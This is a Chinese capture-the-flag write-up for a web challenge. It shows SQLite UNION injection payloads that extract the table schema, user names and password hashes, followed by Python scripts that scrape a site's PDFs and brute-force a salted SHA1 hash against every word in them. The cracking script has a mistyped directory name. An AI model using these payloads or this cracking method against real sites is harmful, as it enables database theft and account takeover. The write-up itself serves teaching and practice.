dirsearch 扫描发现四个文件

在login.php 中发现

 

输入 http://61.147.171.105:61912/login.php/?debug 发现源码

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>

 $db = new SQLite3('../fancy.db');        // 这道题是 sqlite数据库，不是mysql

 $res = $db->query("SELECT id,name from Users where name='".$user."' and                                  password='".sha1($pass."Salz!")."'");

if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/'); 

（1） 

 usr=' union select name,sql from sqlite_master--&pw=''

注入到 $res 中成                                        

SELECT id,name from Users where name='' union select name,sql from sqlite_master--

union 前面的语句没用了，name 等同于 if 语句中的 id，sql 等同于 name。所以cookie中的结果为

CREATE TABLE Users(
    id int primary key,
    name varchar(255),
    password varchar(255),
    hint varchar(255)
);

获得sql语句。 

（2）

usr=' union select id,group_concat(id) from users--+&pw=''

usr=' union select id,group_concat(name) from users--+&pw=''

usr=' union select id,group_concat(password) from users--+&pw=''

或者用 limit 0,1

 

（3） 

想到在查看 robots.txt 的时候有个 admin.php,选 admin 来破解，根据 hint 猜测 fav word 藏在前面看到的 pdf 里面，需要写个脚本，把里面的词都给提取出来，拼接上”Salz!”然后 sha1 加密，看看是否跟 3fab54a50e770d830c0416df817567662a9dc85c 相等。想办法把 pdf 文件都给爬下来。 

下载所有的pdf文件： 

import urllib.request
import re
import os


def getHtml(url):
    page = urllib.request.urlopen(url)
    html = page.read()
    page.close()
    return html


def getPdfUrl(html):
    global url
    reg = r'href="(.+?\.pdf)"'
    url_re = re.compile(reg)
    url_list = url_re.findall(html.decode('utf-8'))
    for i in range(len(url_list)):
        url_list[i] = url[:-10] + url_list[i]
    return url_list


def getUrl(html):
    global url
    reg = r'href="(.+?\.html)"'
    url_re = re.compile(reg)
    new_url = url[:-10] + url_re.findall(html.decode('utf-8'))[0]
    if '../' in new_url:
        return False
    else:
        url = new_url
        return True


def getFile(url):
    file_name = url.split('/')[-1]
    u = urllib.request.urlopen(url)
    f = open(file_name, 'wb')

    block_sz = 8192
    while True:
        buffer = u.read(block_sz)
        if not buffer:
            break

        f.write(buffer)
    f.close()
    print ("Sucessful to download" + " " + file_name)


if __name__ == "__main__":
    url = "http://220.249.52.133:43187/index.html"
    if os.path.exists('pdf_download'):
        pass
    else:
        os.mkdir('pdf_download')
    os.chdir(os.path.join(os.getcwd(), 'pdf_download'))
    
    FLAG = True
    while(FLAG):
        html = getHtml(url)
        url_list = getPdfUrl(html)
        for i in url_list:
            getFile(i)
        if getUrl(html):
            pass
        else:
            FLAG = False

 利用大佬的脚本：

from io import StringIO

#python3
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import TextConverter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal, LAParams
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter


import sys
import string
import os
import hashlib
import importlib
import random
from urllib.request import urlopen
from urllib.request import Request


def get_pdf():
    return [i for i in os.listdir("./pdf_download/") if i.endswith("pdf")]
 
 
def convert_pdf_to_txt(path_to_file):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    codec = 'utf-8'
    laparams = LAParams()
    device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)
    fp = open(path_to_file, 'rb')
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    password = ""
    maxpages = 0
    caching = True
    pagenos=set()

    for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True):
        interpreter.process_page(page)

    text = retstr.getvalue()

    fp.close()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
    pdf_path = get_pdf()
    for i in pdf_path:
        print ("Searching word in " + i)
        pdf_text = convert_pdf_to_txt("./ldf_download/"+i).split(" ")
        for word in pdf_text:
            sha1_password = hashlib.sha1(word.encode('utf-8')+'Salz!'.encode('utf-8')).hexdigest()
            if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'):
                print ("Find the password :" + word)
                exit()
            
 
if __name__ == "__main__":
    find_password()

 爆破出 pass=ThinJerboa

（3）

在 index.php 登录